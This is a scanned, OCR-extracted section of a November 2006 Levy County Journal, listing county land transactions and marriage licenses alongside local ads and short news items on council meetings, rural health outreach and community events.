M, $32,100.00, L25(64) WILLISTON HGH G&CC ESTS Grantee(s): CAMPUS USA CREDIT UNION Grantor(s): ANDERSON CATHLEEN A, ANDERSON JAMES W JR
WD, $43,000.00, L46(10) FANNING SPRINGS ANNEX, W/MH Grantee(s): COTHRON CARLA MANN, COTHRON PHILLIP D Grantor(s): FRISBY MARGARET R, FRISBY JOHN L
WD, $12,900.00, L19(30) OAK RIDGE ESTS SD Grantee(s): AULET DALMA I, MIRANDA JUAN L Grantor(s): H B HAYNE CORP
WD, $10.00, L3(75) REPLAT OF WILLISTON HGH #5, W/MH Grantee(s): COPELTON ANTOINETTE, COPELTON DAVID Grantor(s): COPELTON ANTOINETTE, COUCH LISA M, LARUSSO MARIA I
AAA, $100,000.00, OR 724/551, 847/413, 896/818, 980/934, 980/938, 987/457, BDY 23, 26-13-18, ETC Grantee(s): COMMUNITY BANK & TRUST OF FLORIDA Grantor(s): SHARP SARA PARKS, SHARP PAUL M
WD, $125,000.00, L45 TOM KNOTTS, BDY 33-16-16, PARCEL #13577-000-00 Grantee(s): STEINBAUM SHARI, STEINBAUM LEONARD Grantor(s): FLORIDA LAND OF DREAMS LLC
M, $71,047.00, L2,4(35) CHIEFLAND, W/MH Grantee(s): AMERICAN GENERAL HOME EQUITY INC Grantor(s): SANDERS YOLANDA, SANDERS DONNELL
WD, $39,995.00, L64(32) RAINBOW LAKES ESTS SEC N Grantee(s): QUINTERO ELVIRA, ZAMBRANO LUIS FERNANDO Grantor(s): AMERICAN PRIME LLC
M, $33,995.75, L64(32) RAINBOW LAKES ESTS SEC N Grantee(s): AMERICAN PRIME LLC Grantor(s): QUINTERO ELVIRA, ZAMBRANO LUIS FERNANDO
E, $1.00, L19(12) OAK RIDGE ESTS Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): TURBEVILLE DONNY L JR
E, $1.00, L3(1) THE FARMS @ WILLISTON #1 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): SPARKS WANDA K, SPARKS CHARLES W JR
E, $1.00, L9-10(12) SUWANNEE RIVER HGH Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): SWS PROPERTIES LLC
E, $1.00, L5(A) LIBBY HTS MH COMM Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CRIBBS PHILLIS E, CRIBBS TIMOTHY W
E, $1.00, L5(1) CIRCLE K RANCH, ETC Grantee(s): CENTRAL FLORIDA
ELECTRIC COOPERATIVE INC Grantor(s): BARKER INC, BARKER OSBORN
E, $1.00, L4 NORTHWOOD HTS Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CSS PROPERTIES LLC, STEWART C SHAWN
E, $1.00, L17-18(4) SHERWOOD FOREST Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): MCNEIL TANYA K, MCNEIL LARRY R
E, $1.00, L14(1) TISHOMONGO PLANTATION SD Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): NIPPER FAITH R, NIPPER MERRELL I
E, $1.00, L8-9(F) ELESTON ADD Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): DALLAS RUDOLPH
E, $1.00, L17 FIVE OAK ACRES SEC 1 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): STATES DOTTIE LOU, STATES OLIVER L, STATES OLIVER LEWIS
WD, $10.00, L35(4) FANNING SPRINGS ANNEX Grantee(s): STRICKLAND DONNA L, STRICKLAND SELBY WAYNE Grantor(s): SWS PROPERTIES LLC
M, $62,500.00, L35(4) FANNING SPRINGS ANNEX Grantee(s): MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC, SUNTRUST MORTGAGE INC Grantor(s): STRICKLAND DONNA L, STRICKLAND SELBY W
E, $1.00, BDY NE1/4 SW1/4 29-11-17, PARCEL #03233-277-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): MURILLO VIDA LUCERO
E, $1.00, L18-19(8) FANNING SPRINGS ANNEX Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CORRELL PERRICONE GINNY, PERRICONE GINNY CORRELL, PERRICONE ARTHUR L
E, $1.00, BDY SE1/4 SW1/4 33-12-18, PARCEL #04253-003-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): PEREZ RAUL
E, $1.00, L8(K) CEDAR KEY SHORES REPLAT Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): GEORGE JAMES A, GEORGE TERESA A
E, $1.00, L8(C) GLENWOOD ESTS Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): KOONCE DEREK K
E, $1.00, L2 HENRY TAYLOR ADD Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): MACMILLAN CATHERINE B, MACMILLAN MICHAEL
E, $1.00, BDY NE1/4 SHIN 1-12-14, PARCEL #00870-014-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s):
GOLDING MARY R
E, $1.00, BDY N1/2 N1/2 16-11-14, PARCEL #00633-001-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CLYATT LAND TRUST, CLYATT MONT
E, $1.00, BDY NE1/4 SW1/4 22-14-16, PARCEL #026621-001-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): LIMBAUCH KATHRYN L, LIMBAUCH STANTON, LIMBAUCH STANTON D
WD, $115,000.00, L18(17) AF KNOTTS LAND COMPANY Grantee(s): SCARPATI JENNIFER S, SCARPATI ANTHONY V Grantor(s): FISCHER ELEANOR, FISCHER FRANCIS
M, $75,000.00, L18(17) AF KNOTTS LAND COMPANY Grantee(s): EQUITY MORTGAGE GROUP INC Grantor(s): SCARPATI JENNIFER S, SCARPATI ANTHONY V
QCD, $10.00, L5(J) FOX GROVE FARMS SD Grantee(s): LAING YVONNE D FOSTER Grantor(s): SUMM INVESTMENT INC
M, $52,400.00, L5(J) FOX GROVE FARMS SD Grantee(s): PERTNOY JOSHUA Grantor(s): LAING YVONNE D FOSTER
WD, $4,500.00, L8(14) WILLISTON HGH #14 Grantee(s): WIX KIM J, WIX JAMES Grantor(s): LAKE PROPERTY INVESTMENT GROUP OF NORTH FLORIDA
M, $15,000.00, L5(5) WOODPECKER RIDGE Grantee(s): PERKINS STATE BANK Grantor(s): WHITTLE SYLVIA I, WHITTLE GERALD L
QCD, $10.00, L24(6) OAK RIDGE ESTS, W/MH Grantee(s): RUVIO DAVID L III Grantor(s): RUVIO DAVID L
M, $55,000.00, BDY NE1/4 NE1/4 6-12-18, PARCEL #03998-014-00, ETC Grantee(s): NAVY FEDERAL CREDIT UNION Grantor(s): GOSEIN ASTRID E, GOSEIN DOMINIC
WD, $6,000.00, L16-17(20) RAINBOW LAKES ESTS SECTION Grantee(s): LAND TRUST NO 5, CLARK RICHARD TRUSTEE Grantor(s): WORLEY DENISE D
WD, $6,000.00, L16-17(20) RAINBOW LAKES ESTS SECTION Grantee(s): CLARK RICHARD TRUSTEE, LAND TRUST NO 5 Grantor(s): AKIN CLARA
QCD, $6,000.00, L16-17(20) RAINBOW LAKES ESTS SECTION Grantee(s): CLARK RICHARD TRUSTEE, LAND TRUST NO 5 Grantor(s): MARTIN CAROL A
AD, $10.00, OR 681/32, 712/348, L10, 12 FANNING SPRINGS WOODED ESTS Grantee(s): HENDRICKS LUCY J Grantor(s): CHARLES B HENDRICKS REVOCABLE LIVING TRUST, DAVID MOWREY CONSTRUCTION, HENDRICKS CHARLES B TRUST, HENDRICKS PATRICIA L
QCD, $10.00, BDY SE1/4 SE1/4 2-12-14, PARCEL
#00545-000-00, ETC Grantee(s): STALVEY MARY JANE, STALVEY WILLIAM H Grantor(s): HOOKER BARBARA F, HOOKER DEAN
WD, $44,995.00, BDY L18(14) RAINBOW LAKES ESTS SEC N, ETC Grantee(s): MOYA GERARDO Grantor(s): AMERICAN PRIME LLC
M, $37,051.35, BDY L18(14) RAINBOW LAKES ESTS SEC N, ETC Grantee(s): BANK OF AMERICA NA Grantor(s): MOYA GERARDO
More on page 19
LEVY COUNTY JOURNAL AROUND THE COURTHOUSE THURSDAY, NOVEMBER 16, 2006 Page 19
Land Transactions
M, $4,499.00, BDY L18(14) RAINBOW LAKES ESTS SEC N, ETC Grantee(s): AMERICAN PRIME LLC Grantor(s): MOYA GERARDO
D, $10.00, BDY SE1/4 SW1/4 3-12-17, PARCEL #03278-128-00 & #03278-088-00 Grantee(s): ALONSO MOLINA CYNTHIA M, MOLINA CYNTHIA M ALONSO, RANIERI CARMEN Grantor(s): ALONSO BELQUIS ESTATE, MOLINA CYNTHIA M ALONSO, ALONSO MOLINA CYNTHIA M
M, $110,000.00, L120 FOREST PARK UNIT 3 PHASE II Grantee(s): CAPITAL CITY BANK, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): DZIEKAN MARY L
WD, $200,000.00, L4(58) UNIVERSITY OAKS Grantee(s): BLOODWORTH SHANNON D, BLOODWORTH TIMOTHY M Grantor(s): STEVE SMITH CONSTRUCTION INC
M, $204,300.00, L4(58) UNIVERSITY OAKS Grantee(s): JP MORGAN CHASE BANK NA Grantor(s): BLOODWORTH SHANNON D, BLOODWORTH TIMOTHY M
M, $27,871.64, L87(7) FANNING SPRINGS ANNEX, W/MH Grantee(s): CAPITAL CITY BANK Grantor(s): SCOTT WILLIAM, GRAMS WILLIAM SCOTT
M, $38,849.39, L6(19) JB EPPERSON ADD TO WILLISTON Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): EDWARDS LAQUWANDA, EDWARDS LAJESKI, BROWN LAQUWANDA
M, $79,088.42, BDY NE1/4 SW1/4 9-13-19, PARCEL #05157-000-00 Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): ZAMORA AMIER, ZAMORA FELIX R
WD, $85,000.00, L1-3(6) SUWANNEE RIVER HTS Grantee(s): HUDSON TONYA Grantor(s): COX H FRANK TRUSTEE, COX SHELLEY A TRUSTEE, H FRANK COX TRUST
M, $72,649.00, L1-3(6) SUWANNEE RIVER HTS Grantee(s): AMERICAS WHOLESALE LENDER, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): HUDSON TONYA
M, $13,500.00, L1-3(6) SUWANNEE RIVER HTS
Grantee(s): LEVY COUNTY Grantor(s): HUDSON TONYA
WD, $5,000.00, L32(30) OAKDALE HTS Grantee(s): KHUU LINH, PHAM LINH Grantor(s): FINANCEALL LLC
AD, $42,000.00, L AM-1 GLEASONS TRAILER VILLAGE, W/MH Grantee(s): CARRANZA GILMA Y Grantor(s): DAILEY LAUREN J, DAILEY ROBERT L
M, $8,500.00, L13(13) BRONSON HTS SD Grantee(s): CAPITAL CITY BANK Grantor(s): MCCHESNEY LAURA, ULLERY DIANNA
M, $73,044.83, L29 FOREST PARK UNIT 2 Grantee(s): WELLS FARGO FINANCIAL SYSTEM FLORIDA INC Grantor(s): ROSA BENJAMIN, MILLER DONNA F
WD, $194,000.00, L15(54) UNIVERSITY OAKS Grantee(s): HAYNES ROBERT T JR Grantor(s): VAN PELT MARGARET B, VAN PELT RONALD P
M, $144,000.00, L15(54) UNIVERSITY OAKS Grantee(s): PROVIDENT FUNDING GROUP INC, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC, PFG LOANS INC Grantor(s): HAYNES ROBERT T JR
MMA, $25,000.00, DOCUMENT #452299, BDY N1/2 24-12-13 Grantee(s): BANK OF AMERICA NA Grantor(s): SIKES JODI L, SIKES CLAUDE E
M, $74,836.32, BDY 22-12-14, PARCEL #01039-000-00 Grantee(s): WACHOVIA BANK NATIONAL ASSOCIATION Grantor(s): LEGGETT ESTHER M, LEGGETT HENRY L
WD, $8,000.00, L30(12) OAKDALE HTS Grantee(s): LANDBANK LLC Grantor(s): ROBERSON JOANNA S, ROBERSON SCOTT S
QCD, $10.00, L1, 9(4) CEDAR HAVEN ESTS Grantee(s): BELCHER PEARL R, BELCHER PEARLE R Grantor(s): BELCHER JESSE ALLEN
QCD, $10.00, L23(1) CEDAR HAVEN ESTS Grantee(s): BELCHER PEARL R, BELCHER PEARLE R Grantor(s): BELCHER JESSE ALLEN, BELCHER PEARL R, BELCHER PEARLE R
AAA, $376,321.93, OR 740/919 Grantee(s): CAPITAL CITY BANK Grantor(s): WARE OIL & SUPPLY COMPANY INC
WD, $260,000.00, L30 MANATEE WOODLANDS, BDY 31-11-14 Grantee(s): STOUT CATHLEEN, STOUT DAN Grantor(s): HOPE DOUGLAS O
M, $182,000.00, L30 MANATEE WOODLANDS, BDY 31-11-14 Grantee(s): TREASURE COAST HOME TEAM FINANCING CORP Grantor(s): STOUT CATHLEEN, STOUT DAN
M, $75,000.00, L30 MANATEE WOODLANDS, BDY 31-11-14 Grantee(s): HOPE DOUGLAS Grantor(s): STOUT DAN, STOUT CATHLEEN
WD, $85,000.00, L11 RAINBOW HTS SD PHASE 1 Grantee(s): MCHENRY
JAMES ROBERT, MCHENRY ANA MARIA Grantor(s): GARCIA ANA MARIA, MCHENRY ANA MARIA, MCHENRY
SHINE will help with Medicare questions
SHINE (Serving Health Insurance Needs …) … bottles or a list of your drugs with dosages and the quantities you take daily to any of the following sites:
Levy County:
Bronson Library, 600 Gilbert St.: Saturday, Nov. 18, 1-3 p.m.; Wednesday, Dec. 6, 1:30-4 p.m.
Chiefland Senior Center, 305 SW 1st St.: Wednesday, Nov. 29, 9 a.m.-noon; Wednesday, Dec. 13, 9 a.m.-noon
Williston Library, 10 SE 1st St.: Saturday, Nov. 18, 10 a.m.-noon; Wednesday, Dec. 6, 9 a.m.-noon
Yankeetown Library, 11 56…
…to you. You can receive assistance by phone.
…Plan in 2006, go through the "View Your Current Plan" tool in the box on the right side of the screen. This allows you to compare your current plan in 2007. You may be eligible for extra help in paying for the plan premium, deductible and drugs without penalty. You must meet the following criteria to qualify:
Single: income is $14,700 or less; assets total $11,500 or less.
Couple: income is $19,800 or less; assets total $23,000 or less.
Assets do not count your home or your vehicles. They do count your cash in the bank, CDs, stocks, bonds, cash value on your life insurance or burial policies, and any additional property.
Come on by and browse Local Artists' Gallery of Equine, Western and Landscape Art. Antique Consignment. MONTANA FURNITURE, Tues.-Sat. 11 a.m.-5 p.m., at 40 NW 16th St. in Williston.
LUNCH: MONDAY-SATURDAY 11 AM-2:30 PM. DINNER: MONDAY-THURSDAY 5 PM-9 PM, FRIDAY & SATURDAY 5 PM-10 PM. Private Dining Room for Special Occasions. Beer and Wine. Take-Out and Catering Service Available. Now serving Pizza and Calzones. TV Room is open, so come watch the Game with us! Holiday Specials Coming Soon. 115 N.W.
First Street, Trenton, Florida, 352-463-8494
JAMES ROBERT
WD, $10.00, L6 RAINBOW HTS SD PHASE 1 Grantee(s): MCHENRY ANA MARIA, MCHENRY JAMES ROBERT Grantor(s): MCHENRY JAMES ROBERT
CD, $10.00, OR 420/113, L7(62) WILLISTON HGH G&CC ESTS Grantee(s): COLLAZOS ADELAIDA, BOTERO CARLOS A Grantor(s): WILLISTON GOLF AND COUNTRY CLUB CORPORATION
WD, $20,500.00, L7(62) WILLISTON HGH G&CC ESTS Grantee(s): COLLAZOS ADELAIDA, BOTERO CARLOS A Grantor(s): MCCURDY DALE, MCCURDY WILLIAM W, MCCURDY CHARLOTTE D
CD, $10.00, L25(36) OAK RIDGE ESTS Grantee(s): DE JESUS JENNIFER, DE JESUS RAMON L, DEJESUS JENNIFER, DEJESUS RAMON L Grantor(s): MATOS MARIA, MATOS LUIS
CT, $100.00, 38-06-CC-187, L20(5) FANNING SPRINGS ANNEX, W/MH Grantee(s): RANDOLPH JOHN, RANDOLPH PAULA Grantor(s): CLERK OF COURT DANNY J SHIPP, ELLIOTT MARILYN, TREST LEONARD EDWARD III, TREST MARILYN
WD, $73,400.00, BDY NE1/4 NE1/4 3-12-17, W/MH Grantee(s): WATERS MARJORIE A Grantor(s): RICHARDSON PENNY
M, $72,824.00, BDY NE1/4 NE1/4 3-12-17, W/MH Grantee(s): COUNTRYWIDE HOME LOANS INC, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): WATERS MARJORIE A
M, $90,000.00, L4(3) PLEASANT ACRES, BDY 34-16-17 Grantee(s): BRANCH BANKING AND TRUST COMPANY Grantor(s): SPRUILL ROY, SPRUILL DONNA
M, $134,000.00, BDY SE1/4 SW1/4 29-11-17 Grantee(s): HARBOR FEDERAL SAVINGS BANK Grantor(s): BLANCO AMPARO, BLANCO GUSTAVO
WD, $1,000.00, L24(2) FANNING SPRINGS ANNEX Grantee(s): OCONNOR WILL, COLLINS JEFFREY L Grantor(s): COLLINS JEFFREY L
WD, $1,000.00, L8-10(2) SUWANNEE RIVER HGH Grantee(s): OCONNOR WILL, COLLINS JEFFREY L Grantor(s): COLLINS JEFFREY L
WD, $1,000.00, L23(2) FANNING SPRINGS ANNEX Grantee(s): OCONNOR WILL, COLLINS JEFFREY L Grantor(s): COLLINS JEFFREY L
M, $28,180.06, L68(10) FANNING SPRINGS ANNEX Grantee(s): BENEFICIAL FLORIDA INC Grantor(s): VOWLES PATRICIA M, VOWLES LARRY S
M, $13,265.15, L7(3) WILLISTON HGH SD #14 Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): MCCOY ALICE E, MCCOY RICHARD V
Couples
apply for marriage licenses
Bernard Lewis Wallace, 10/28/66, and DeeAnn Leilani Akina, 1/14/77, both of Williston.
Tanya Lynn Presley, 12/18/84, of Archer, and Jesse Bryan Lambert, 7/28/82, of Floral City.
Ray Anthony Polk, 2/5/68, and Toni Lee Pitts, 11/22/61, both of Archer.
Amber Lynn Martin, 10/31/86, of Inglis, and Richard Gregory Smith, 4/9/85, of Bronson.
William Earl Couey, 9/11/69, and Deanna Chenille Wasner, 11/2/63, both of Chiefland.
Gary Dale Ridgeway, 4/12/85, of Chiefland, and Amanda Lynn Lamb, 7/4/85, of Trenton.
Christopher Angelo Nieves, 9/11/80, of Leesburg, and Joy Leazeneth Harding, 6/15/85, of Williston.
Ryan Mark Anders, 11/23/86, of Morriston, and Jessica Lynn Huggins, 7/1/88, of Williston.
Curtis Dale Stacy, 2/14/76, and Joanna Lyn Tedin, 9/10/82, both of Chiefland.
Lunch Menu: Garden Salad, French Fries, Buttered Corn, Chilled Mix Fruit, Asst. Milk. Tuesday, Nov. 21: Spaghetti w/Meat Sauce, Garden Salad, Green Beans, Chilled Peaches, Homemade Rolls, Asst. Milk.
"Care for the Entire Family" Friday 9 a.m.-Noon & 2 p.m.-6 p.m. Tuesday 8 a.m.-12:30 p.m. Thursday 8 a.m.-Noon & 2 p.m.-5 p.m. Walk-Ins Welcome
THINK BEFORE YOU STRIKE.
Fill Dirt & Hauling, Located On South 21, Williston, Florida, (352) 528-3520, Office @ B&G Seed. Other Contacts: (352) 339-4713, (352) 339-2704 or (352) 339-6435 (loader operator)
Be responsible with your pets especially during the holidays
BY LINDA KEARCE, SPECIAL TO THE JOURNAL
Sometimes we think that giving our pet food, shelter and love is enough. As responsible pet owners, we must also protect our pets from the hidden dangers that come along with this time of year. Pets are highly sensitive to smells, which may bring them into the kitchen where all the cooking is happening. Be especially sensitive to Fido or Fluffy, as they might get underfoot when "Tom Turkey" is coming out of the oven.
Hot drippings or other hot spills could cause scalding or burns to your pet. DON'T FEED pets cooled drippings. The added spices and rich stock can easily upset your pet's digestive system. BONES ARE DANGEROUS! Poultry bones splinter easily, each year causing thousands of pets pain and sometimes death. Increased activity and visitors around the home can upset your pet's routine. Try to keep your pet on a regular feeding and exercise schedule. Try to resist the temptation of dressing up your pet with ribbons around their necks. The ribbons can tighten if caught on something and can result in choking.
Linda Kearce works with Trenton Animal Hospital in Trenton.
Beautiful 4 BR/2.5 BA house in Williston at 21350 NE 40th Ave., 1,630 sq. ft. with carport & bonus room on large corner lot. It is 2 miles east of City Hall on C.R. 318. Listed for $125,000, thousands under appraisal! SHIP down payment assistance for moderate income families on this house is $15,600. Call Florida U.S.A. Realty, Inc. 352-378-3783.
The construction consists of 2x6 exterior walls, and includes a water system, alarm system, stainless steel dishwasher, stainless steel kitchen sink and a stainless steel double sink in the laundry room. It has a large pantry and laundry room with wood cabinets, separate ice maker machine in bar area, oversized garage at 814 sq. ft. with a workbench, pumphouse! Some furniture will remain in the home. All of this is in the Buck Bay subdivision! $275,000
Brand new construction! Custom built home in golf course community. 30 year architectural shingles, wood floors in kitchen and entry, 36 inch kitchen cabinets, stainless steel appliance package. Short drive to Manatee Springs State Park, Chiefland Golf and Country Club, shopping, medical, and schools. A must see! $219,000
Regina Goss, Licensed Real Estate Broker, GOSS … REAL ESTATE, INC.
MOBILE HOMES:
Whitted Mobile Home Estates: 3/2 DWMH on 2 lots, screened porch, detached carport & more. Owner financing to qualified buyer! Reduced! $62,500.
Hideaway Adult Park: 2 BR, 2 bath DWMH on landscaped lot. Carport, storage & screen porch additions. Includes private well. Reduced! $76,…
…Reduced: $105,000.
8.9 Acres just off U.S. Alt. 27. Reduced: $110,000.
5 Wooded Acres, Gilchrist County, some pecan trees. Reduced to $76,500!
100 Acres, Williston area, pines, oaks, holly & more, small ponds. Reduced to $15,000 per acre. Motivated seller.
Corner Parcel: 80 Ac at corner of 2 paved roads, planted pines. $15,000 per acre.
80 Acres: 1/4 mile paved road frontage, large oaks. Reduced! $13,000. 2nd one: Reduced! $12,500.
10-Acre Tracts: 4 to choose from. Great location close to Golf Course. Priced $125,000 to $139,000.
HOMES:
Waterfront: 1.5 Acres w/390' on canal, 3/2 home partially furnished. Immaculate. $285,000.
Details and photos at …com. 102 S. Main Street, Chiefland, FL 32626. Office: 352-493-2838. Evenings: 352-493-1380.
ARE YOU A SERIOUS SELLER? IF YOU OWN REAL ESTATE & WANT MAXIMIZED VALUE, CONTACT YOUR CURRENT REAL ESTATE AGENT OR ANY OF THE REAL ESTATE PROFESSIONALS LISTED BELOW WHO CAN EXPLAIN THE BENEFITS OF HAVING YOUR PROPERTY INCLUDED IN THE UPCOMING GREAT NORTH CENTRAL FLORIDA REAL ESTATE AUCTION!!!
*HAVE YOUR PROPERTY EXPOSED TO MILLIONS OF PEOPLE IN THE EASTERN UNITED STATES & INTERNATIONALLY *READY AND WILLING & ABLE TO BUY *PRE-APPROVED FINANCING FOR BUYERS *ALL TYPES OF PROPERTY *NO SALES COMMISSION *NO CLOSING COSTS *NOMINAL LISTING FEE $1,000 TO $4,000
HOUSES, CONDOS, HOMESITES, ACREAGE TRACTS, WATERFRONT, COMMERCIAL. BEN CAMPEN AUCTIONEERS, Licensed Real Estate Broker, #1901-AU#21-AB#218
To list your home or property, call Laura at 486-2312.
We have prices to fit every budget.
LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006 Page 21
Workshops will inform you on agribusiness
Agritourism and nature tourism can take many forms. Examples include roadside stands, farmers' markets, overnight farm stays, ag tours, bed and breakfasts, hunting, U-Pick operations, pumpkin patches, nature based operations, aquaculture tours, Christmas tree farms, corn mazes, farm animal petting zoos and wine tasting. These attractions can bring profits never realized through the traditional farm and ranch operations of growing and selling food and fiber.
The Original Florida Task Force, University of Florida, Suwannee River Valley, and VISIT FLORIDA are sponsoring a series of educational workshops that will help farm and land owners and aquaculture businesses create or strengthen tourism businesses to supplement their ongoing farm operations. For workshop information or comments please contact Linda Landrum at 386-362-1725, ext. 105.
Three Workshops:
Workshop #1: Overview of Agritourism and Ecotourism Opportunities. Dec. 6, 9 a.m.-3 p.m., Stephen Foster Folk Cultural Center, White Springs.
Workshop #2: The Nuts and Bolts of Starting an Agritourism or Ecotourism Business. Jan. 9, 2007, 9 a.m.-3 p.m., Camp Weed, Live Oak.
Workshop #3: Show Me the Money and Put It All Together. Feb. 7, 2007, 9 a.m.-3 p.m., Spirit of the Suwannee Music Park, Live Oak.
These workshops are $10 per person and include lunch. By completing all three workshops, agri/eco-tourism providers are eligible to be included in Original Florida's forthcoming marketing and promotion opportunities for the region. Sponsored by the University of Florida IFAS North Florida Research and Education Center-Suwannee Valley and VISIT FLORIDA.
The Levy County Visitor's Bureau hopes there are businesses in Levy County who are looking for ways to improve their business or start a new one.
These workshops will provide insight and new ways to develop additional income for agritourism and ecotourism businesses.
LAND CLEARING: DRIVEWAYS, PONDS, GRADING, FREE ESTIMATES, TRACTOR WORK, ROCK & DIRT... Call: (352) 406-1117
Bronson Library to host popcorn and movie
Bronson Public Library will host popcorn and a movie Nov. 27 at 4 p.m. The feature film will be the saga of Lightning McQueen, a hot-shot animated stock car voiced by actor Owen Wilson. En route to a big race, the cocky McQueen gets waylaid in Radiator Springs, where he finds the true meaning of friendship and family. The film is rated G and runs 116 minutes. Contact the library at 486-2015 or Jenny Rodgers, Youth Services Coordinator, at 486-5552 for more information on these exciting events.
Low Rates, Easy Terms. Personal & Commercial Auto Insurance. Home, Life, Commercial. Rapid Tax Returns. "Guaranteed Lowest Down Payment"
TURN THIS... INTO THIS! Find your dream home in the Marketplace!
NEW LISTING! Beautiful .36 Acres Lot off of Hwy 27 in Bronson Heights Area! Priced to Sell! $22,000. Natalie 219-8365, MLS#753746
4 BR/2.5 BA, $392,000. Natalie 219-8365, MLS#754449
NEW CONSTRUCTION! To See Your Home, Give Us a Call
NEW LISTING! Nice .24 Acres Lot in Bronson. Great for your Mobile Home or Site Built Home! Priced to SELL! $20,000. Natalie 219-8365, MLS#754443
3 BR/2 BA, $149,900. Tom 317-…, MLS#745435
4 BR/2 BA, $191,900. Tom 317-9476, MLS#754…
Block 3 BR/2 BA Home, $229,000. Noemi 316-5644, MLS#754076
OPEN HOUSE SUNDAY 1:00-3:00 PM, 501 N. Court St., Bronson. Call Noemi for details, 316-5644. Refreshments will be served.
LEVY COUNTY JOURNAL, THE COUNTY PAPER, EST. 192…
Call Laura to list your house in the Marketplace. 352-486-2312
Housing: Continued from front
…to allow for greater density development so the Roswell complex plans can move forward.
Debra Jones' motion to approve the first reading of the proposed ordinance received unanimous approval after being seconded by Jerry Robinson. Council will hear the second reading of the ordinance Nov. 21. The developer is trying to acquire additional acreage at this time, according to Garcia.
Nature Coast Business Development Council executive director Pam Blair updated council members on the enterprise zone development strategic plan. Blair will present the plan to the board of county commissioners Nov. 21 and will then submit it to the state. "We definitely have the attention from the state," Blair told council. A decision is expected from the state before January 1. If the plan is approved, the county can offer inducements to potential businesses locating within specified zones.
Levy County Health Department employee Slande Celeste spoke before council, seeking to enlighten council members about the health issues facing residents, and to gain participation in an ongoing group involved in improving the health of area residents. Celeste runs the group RICH, or Reaching to Improve Community Health, a consortium of individuals and organizations that strives to increase health awareness and forge partnerships between groups working to create a healthier populace. RICH meetings are held at 9 a.m. the second Tuesday of each month at the Levy County Health Department in Bronson.
School: Continued from front
Administrative superintendent Jeff Davis said various construction projects were moving along. Board member Paige Brookins moved and Mrs. Shuster seconded approval of a blue roof for Chiefland Middle School's gymnasium. The board also set an executive session to discuss ongoing litigation with Juanita Terrell. A closed session will be held Nov. 21 to discuss the lawsuit.
Journal photo by Cassie Journigan
FATHER AND SON: Bill and Joshua Allen share a hard day of fishing at Fanning Springs. Said Dad, "It's just not a good day for fishing.
Wrong day, wrong place, or wrong time." Rejoined son, "Not one has bit since morning." Still, with the sun, the warmth, the scenic beauty, neither was frowning.
Rural health takes front and center at Bronson meeting
BY CASSIE JOURNIGAN, STAFF WRITER
Cardiovascular disease is high on the list of health problems confronting Levy County residents. Combine that with poverty, smoking, obesity and lack of access to health care and you have a picture of common causes of death faced by area residents.
Health Department representative Slande Celeste spoke to Bronson's town council Nov. 6, seeking both to enlighten council members about the health issues facing residents, and to gain council participation in an ongoing group involved in improving the health of area residents. "Rural counties have a poorer health status than larger counties. We shouldn't settle for a poor health status," Celeste said.
The health department hosts a committee that aims to bring a better health outlook to area residents. RICH, or Reaching to Improve Community Health, is a group of individuals and organizations that strives to increase health awareness and forge partnerships between groups working to create a healthier populace. "The purpose of the group," Celeste said, "is to get everyone who is interested involved in working for better community health."
"Levy County overall has a high poverty rate and limited access to health care. Bronson's health department has two providers and an overwhelmed caseload," Celeste said. She added they are currently unable to take on new cases due to a lack of money and space. "We are hoping to increase awareness, and by offering prevention programs, to give people alternatives," she said.
RICH meetings are held at 9:00 a.m. the second Tuesday of each month at the Levy County Health Department in Bronson. Both the public and local government leaders are invited to attend. For more information call Celeste at 493-6774.
Little Women held over

Little Women, a production of the Suwannee Valley Players, will be held over one additional weekend Nov. 17-19. Shows on Fridays through Saturdays begin at 8 p.m. and on Sundays at 2:30 p.m. Ticket prices are $8 for adults and $6 for students with ID. For more information, log onto www.svplayers.com.

Police: Continued from front

Journal photo by Cassie Journigan

COMMISSIONERS RECOGNIZED RECREATION committee members who worked on the renovation of Buie Park. Pictured are Rollin Hudson, Blake Davis, Shane Keene, Wayne Weatherford, Buie family member Edith J. Williams, Jennifer Willis, Alice Monyei, Teal Pomeroy and Teresa Barron. Members honored but not present include Dorothy Scott and Myron Watson.

"...department, should be doing." The ordinance will be tabled until the Nov. 27 meeting.

Chiefland commissioners read a resolution officially renaming a city street in honor of resident Eddie Buie at Monday's city commission meeting. Noting Buie's devotion to his community, the resolution sets aside Southwest 5th Street, from Southwest 4th Avenue to the city boundary, as Buie Park Road. The city will now forward the proclamation to the county and request their reciprocal action.

